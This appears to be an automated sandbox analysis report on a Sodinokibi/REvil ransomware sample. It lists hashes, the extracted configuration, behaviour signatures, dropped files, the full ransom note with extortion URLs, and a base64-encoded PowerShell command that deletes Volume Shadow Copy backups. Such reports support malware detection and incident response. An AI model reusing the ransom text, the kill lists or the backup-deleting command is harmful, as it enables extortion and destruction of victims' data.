Overview

overview

10

Static

static

10

3a592e04fc...2c.exe

windows7-x64

10

3a592e04fc...2c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    126s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    09-03-2024 21:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c.exe

  • Size

    123KB

  • MD5

    8be4b3f41ef22c97f04eeb68d490dd5b

  • SHA1

    e94debf303e6b83194e45659a7cb8f26b7ad8519

  • SHA256

    3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c

  • SHA512

    926102a46daf75c877f07870f0e0d298518f5699f453d525f946b8eaa9fed3934603cdd6e6f5e6e7c3be8825ebd3cf1a055f119bb7d862a3cfa7ff48cd436617

  • SSDEEP

    1536:7DvcP30ThpshwVs5OE8yNcYQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxN:yrSVhaNcYM8gnBR5uiV1UvQFOxN

Score
10/10
sodinokibi$2a$10$ctl6mpbcozzcr.aru3gxp.pcftg0jof6upmmrky0hc0o.x.alltz.4085persistenceransomware

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr
Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\0q611h83c-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 0q611h83c. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/471229BDD599EAFA 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/471229BDD599EAFA Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: cvLnwyNY//vjk57Oo7g2qvG3tecAKxuusvVbyalQYkKK5Val2fuPbsenykJivcP9 a6wyI7xQDaePhkKIDwxC4hfyORXH07BT4Bi52hhmHUw2JrZRuu/W2XgfxX/NFVIP gc0jZBqC3na34s6eX7138+GfW7hsylOzPG6Uj3wGzFv09L1x0pVA0Ll1GUXE1Flj wiR4MwaBtjiktBw2vShxCXrBtguCAWTtDftdK5pKdZulPQR6hEWrp7/B6WWDtyv/ 0c72+CVglIXBTygQubD4M50Ubx9ZxLcZmW7nSlKOR2p7cjNuUQqWRapxljU6OQTb zVk/yMKM3v20PqzRRdN8M8xOm3InfUP0dp8H2tGE2KktIyE+lMneiDZLtUFUBWBx BMWPnJqxf95jwS6q9dmvyiH6BZu1UCBg5Q1WaFzhGDLLP95fIbv89ajuhsqbKPh0 GDhcnnIMcH3eZ5P2ZZxziOttp+ysNGQ79RLQag7EUcHHbgjW+CyxdBoM+lcHyFld 4RiuqulXf/vySGKXKiN8pP16z0yep07GHCLg2fkkPvx4UP2C554HxHLpQ1IUKsMq xW7jqOGWKjbSWvCounFJ+LAe78f4ZH4liLsppWgm8GlUZdvopaZtPQjgYArim2Ev ZMR5w7B85erHnk9q0DiH1icuzQPi6euZGyNfa6u3v8RUhQKJy6Oxcfx/zX/2tqLR UwQkSH1svBKFfkMQ7FEggAmrlIak/ytX6KVQYAb3dBYGZnFlNnndIJgRxpOxvUGl iZlZZJJXGvJhKmfOqprVelVPD/CBD2UA8pkYxx5uU1h3XCcnw18Hfi2I9d2Nx5Ic M/zH+mrSntP2sP59AVEvRwoqY4EBhiGXaM+ZnzR8vKevMJjiuWhtsTOaVbzRL62I oUJcoW5VTySZpM8FwWafqO91WxK6XlanP7jNqYjTkV4YC0ThJhzL9zFmrJa+UdaZ u1vtpEMecKDY06f1yimpd6lTyfE3hGa/QLqfc101ZIF5re8svgbuwmze4HxAo1QF KNTYpnzjuErqMpQsK9NLEtanxCMTlu+jrhcAbIp6qg2hjb6eMgsK1QIFgKagmeMS Gbzn/SlrdS+qc0gLUgSvnUOqtDS2XbwBEqmxBzi1nQmiLhZlB+POVhYrVuJ8xGg7 YaQXwh89OvbUw4l2/0Lxa8wyQSTIIxT3X7FrJPLhkqGtwqcE5mPvWALaso1dXJHR gBAlcKeml85R7/4Onbe4Ulq2m8HiY8cl5HmdWQndym+ZkTYq5oxW0ZYi8EsyDb6g V8p36+iXreuAfEbdWQivYkwIfKPGB/RzSGXzBUM6w+RKiMPBQ0Q1m5xh4WR5C2fq N9NrFrY6cdmf74fiAxhrosJD75oIuljLU5waB+Alez8wLLg7F+w= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/471229BDD599EAFA

http://decryptor.cc/471229BDD599EAFA

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 22 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c.exe
    "C:\Users\Admin\AppData\Local\Temp\3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2132
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2804

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\0q611h83c-readme.txt
      Filesize

      6KB

      MD5

      b54687ef9e19f431decd98e339444928

      SHA1

      5315a0e634bff8af5fd9d403c21ee423fed022e2

      SHA256

      1dc55b9db6c08cf8ac7e2e72144d1db49e3ebe63b5852a1bb91db79ad8054dfb

      SHA512

      9fe45fb44e4f73e8eac165773f17ef3f84dec7f912f5976c5c0034af843bbb8b672050c80d27f4b13ee493a0a5537d005385ab74e1a4dd43ff88e83608d5e2fb

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabA1EC.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarA79E.tmp
      Filesize

      132KB

      MD5

      443b694fb09f9513f53726dd51f257d4

      SHA1

      788aaff13e2595adaa1052b1512ad00da480e88a

      SHA256

      7565512ebecd6ec0b942d6f72903e8fdecaeb3056e4a6cd777d8241e74209937

      SHA512

      0db2a56119a3e04ae628ea24c4229b62a5529fe6a35cc7e77f39420fee774c01290fe7ccf35fa030aaa29da52ee3c21402241ad5d5a87fbd22dad1d2456d21b7

      Download Submit

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      89498979134599a071b38cd1e93085f8

      SHA1

      8f5aff2c308a4298aba328f83280dbd87e86c578

      SHA256

      87a3ac9280ee92196fcb5ffdbe67101f15def216b33973af07dbe84cbda49d6c

      SHA512

      0f4a827875d4111f6ca0bc683d22d9429882073c5827eeddfbde9485fe4a99b7a25cdd8147a4d1f9e2595801641c9b2a47c12319a0345e035f8924bad21030e7

      Download Submit

    • memory/2132-9-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2132-16-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2132-11-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2132-5-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2132-13-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2132-14-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2132-15-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2132-10-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2132-17-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2132-18-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2132-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2132-8-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2132-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2184-0-0x00000000003D0000-0x00000000003F2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2184-12-0x00000000003D0000-0x00000000003F2000-memory.dmp

      Filesize

      136KB

      Download